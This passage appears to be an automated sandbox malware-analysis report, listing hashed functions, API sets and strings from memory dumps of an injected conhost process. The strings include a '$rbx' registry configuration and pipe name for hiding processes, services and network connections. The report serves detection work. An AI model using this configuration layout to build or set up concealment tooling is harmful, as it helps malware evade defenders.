        • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction ID: aec2b88a5ada7077f8313227f28c2493905e2e84048d7c9f24cf727acc2c2c9c
        • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction Fuzzy Hash: FAB17131A106D082EB6CCFA9D4407D9ABA6F744B84F54602EFE8953B96DE79CE42C341
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
        • String ID:
        • API String ID: 3140674995-0
        • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction ID: f199a5492696f3f30af173293778442318ff1d54c246c6245ac653d34c7f6c1f
        • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction Fuzzy Hash: 78317C72604B8086EB648FA4E8403EE7771F784748F44403EEA4E47B9ADF38C649C711
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
        • String ID:
        • API String ID: 3140674995-0
        • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction ID: 47aab1cb2a5275d92f8107270ce85b9802a1e63dd42dc83262a418a0be7f46e3
        • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction Fuzzy Hash: 5B319E76600B8096EB648FA4E8803EE7771F785708F44403EEA4E47BAADF78C249C711
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
        • String ID:
        • API String ID: 1239891234-0
        • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction ID: fa12f00ce2442bcae5fe9ba073c73b183deceb46c41a3ed9b188a915e471b5be
        • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction Fuzzy Hash: AE417F36614B8086E764CF68E8403EE77A5F788794F500129EA9D47B99DF3CC656CB01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
        • String ID:
        • API String ID: 1239891234-0
        • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction ID: 7fa3b129a1acea8c806d8345e9777e1bc75a2178df947a16c192a3e86d306846
        • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction Fuzzy Hash: F1418036614B8086E764CFA8E8403EE77A5F789754F500129FA8D47B99DF7CC256CB01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Find$CloseFile$FirstNext
        • String ID:
        • API String ID: 1164774033-0
        • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction ID: 15896a4928a92b55b576bfecad072520b97665a1541b2fd1fda0909f9c9575d7
        • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction Fuzzy Hash: 8CA1D732B0468059FB289BB9DC403ED6FA2E7417D4F944139FA581769BDA3DC653C702
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Find$CloseFile$FirstNext
        • String ID:
        • API String ID: 1164774033-0
        • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction ID: d22e4ab0525d5f3cc6e32d82e30bbc556f7826e9f5053c4b301918bce1b768a9
        • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction Fuzzy Hash: CBA1E932B046D059FB289BB99C403ED6F66E741B94F144139FEC82769ADABCC643C701

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
        • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
        • API String ID: 2135414181-3414887735
        • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction ID: 19b9363ba9b117aadc5f38c5d88331c09bf7ca28a0eabb84dc0f2f8e1d23a03c
        • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction Fuzzy Hash: F1715C36B10B41C5EB149FA9E8906D97BA6FB85F88F411129ED8D43B2ADF3CC646C341

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
        • String ID: d
        • API String ID: 2005889112-2564639436
        • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction ID: 397b987050f128e22d830f72e8a7bb01dca0d2bfe38299e200fb8c4775a4ba57
        • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction Fuzzy Hash: 16514D32A10B84D6E729CFA6E44839A7BA2F788FD9F444128EE4907719DF3CC156C741

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
        • String ID: d
        • API String ID: 2005889112-2564639436
        • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction ID: 9282f11b0117bad9048345d3caad1c347c3cde219da35e19cb7aa77bd5b0f26d
        • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction Fuzzy Hash: C2513E32A10B84D6E718CFA6E4443AABBA2F788F98F444128EE4907759DF7CD146C701

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
        • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
        • API String ID: 740688525-1880043860
        • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction ID: 92b49dc96b5131c409916216ad549a41d4becdc0c72b5188b1cc2d28516873ec
        • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction Fuzzy Hash: AF518031B0174491EA689B9AE8003E93A52BB49BF0F580739EE3D473D2DF3CD6578642

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
        • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
        • API String ID: 740688525-1880043860
        • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction ID: 4a98a88d6d284d0f9c88db99b35eb8b25f4778613dad35e0901481351cf5e59e
        • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction Fuzzy Hash: AD51C631B0078491EA1C9BDAD8403E56A52B749BB0F580739EE7D473D2EFBCD6078242
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Running Time
        • API String ID: 1943346504-1805530042
        • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction ID: 51ba75afa413aa699ef082d611222e06f217c10dfe0d8860b143505302922adf
        • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction Fuzzy Hash: 0931C432E00A4096E739CF96E804399A7A2FB88BD5F440538EE4943B26DF3CD6578301
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Running Time
        • API String ID: 1943346504-1805530042
        • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction ID: a14e73177fb6ec818ec093f483535a2f273ec9b09c2bf708a0138a00ffdf974b
        • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction Fuzzy Hash: 3131D632E00A8096E729CF96A8043D9A7A2F798FD4F450538FE8943B26DF7CD6578301
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Utilization Percentage
        • API String ID: 1943346504-3507739905
        • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction ID: 5f13050281f0528891d4aec0262be0223551f2dd6dae4639aec2e61a1bc9b2d9
        • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction Fuzzy Hash: B3318131A10B4186E728DFAAE8447996BA2F784FD5F444139EE4A43726DF3CD653C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Utilization Percentage
        • API String ID: 1943346504-3507739905
        • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction ID: 8487525b08424002038c187266372898acc7e2ebf1c03973e613d71a73e0ef91
        • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction Fuzzy Hash: B931D731E00B4196E718DF9AA444799BBA2F788F94F045038EE8A43726DF7CD647C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
        • String ID: csm$csm$csm
        • API String ID: 849930591-393685449
        • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction ID: bce1b4131f8d1c6882e34cfd7861b44665b89da7dfc6fea6e767a31d1ce06383
        • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction Fuzzy Hash: 7AD17F32D047908AEB28DBA994403DD7FA2F7457D8F101139FA9967797CB38C6A2C702
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
        • String ID: csm$csm$csm
        • API String ID: 849930591-393685449
        • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction ID: ecd2f4026fa92adcdb3c6dfa28eb563a24c868728f3069850cd927dc50e5f692
        • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction Fuzzy Hash: EED16072A047908AEB68DFA994403DD7BA2FB45798F100139FEC957797DB78C682C702
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd
        Similarity
        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
        • String ID: csm$csm$csm
        • API String ID: 849930591-393685449
        • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
        • Instruction ID: 8185e2bdd7b651b9ae05a1592e3cd0d3d4748199ea2741b3d7ab9d81f93f8e76
        • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
        • Instruction Fuzzy Hash: 87D1B572A0478086EB68DF69D4813ED7FA1FB45798FA00129FE8957B97DB34C292C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
        • String ID: d
        • API String ID: 3743429067-2564639436
        • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
        • Instruction ID: 5c8331b868025f6b4259b0355af5f24098f85f8d1a52d7978153ff975d2c2170
        • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
        • Instruction Fuzzy Hash: 2F41A333614B80DAE765CF65E44439E7BA2F388B98F448129EB8907B58DF3CC556CB41
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
        • String ID: d
        • API String ID: 3743429067-2564639436
        • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
        • Instruction ID: 601e10264774004a599a900e9f249bba5200d6af0c5ba29cb533b8b8d97cf7f7
        • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
        • Instruction Fuzzy Hash: A8418333614B80D6E764CFA5E44439EBBA2F388B98F448129EE8907758EF7CD546CB41
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
        • String ID: \\.\pipe\$rbx-childproc
        • API String ID: 166002920-1828357524
        • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
